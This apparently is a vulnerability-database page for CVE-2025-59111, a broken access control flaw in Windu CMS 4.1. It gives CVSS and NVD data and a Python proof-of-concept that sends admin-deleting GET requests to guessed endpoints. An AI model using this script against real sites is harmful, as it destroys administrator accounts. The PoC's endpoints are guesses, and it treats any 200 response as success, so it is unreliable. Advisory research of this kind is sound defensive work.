Security Vulnerability Report
中文
CVE-2025-59111 CVSS 6.5 MEDIUM

CVE-2025-59111

Published: 2025-11-18 15:16:33
Last Modified: 2025-12-05 13:16:03
Source: [email protected]

Description

Windu CMS is vulnerable to Broken Access Control in user editing functionality. Malicious attacker can send a GET request which allows privileged users to delete Super Admins which is not possible with GUI. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE
Windu CMS 4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-59111 PoC - Windu CMS 4.1 Access Control Bypass # Target: Windu CMS <= 4.1 (before build 2250) # Vulnerability: Broken Access Control allows deletion of Super Admin users def exploit(target_url, admin_cookie, target_user_id): """ Send a crafted GET request to delete Super Admin user This exploits the broken access control in user editing functionality """ # Target endpoint for user deletion (common Windu CMS patterns) endpoints = [ f"{target_url}/user/edit", f"{target_url}/admin/user/delete", f"{target_url}/api/user/delete", f"{target_url}/index.php/user/delete" ] # Malicious request parameters to delete Super Admin params = { 'action': 'delete', 'id': target_user_id, 'confirm': '1' } headers = { 'Cookie': admin_cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } for endpoint in endpoints: try: print(f"[*] Trying endpoint: {endpoint}") response = requests.get(endpoint, params=params, headers=headers, timeout=10) # Check if deletion was successful if response.status_code == 200: print(f"[+] Potential successful deletion attempt at {endpoint}") print(f"[*] Response status: {response.status_code}") except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-59111.py <target_url> <admin_cookie> <target_user_id>") print("Example: python cve-2025-59111.py http://target.com 'PHPSESSID=xxx' 1") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] user_id = sys.argv[3] print(f"[*] CVE-2025-59111 PoC - Windu CMS Access Control Bypass") print(f"[*] Target: {target}") print(f"[*] Target User ID: {user_id}") exploit(target, cookie, user_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59111", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:32.900", "lastModified": "2025-12-05T13:16:03.203", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Broken Access Control in user editing functionality. Malicious attacker can send a GET request which allows privileged users to delete Super Admins which is not possible with GUI.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.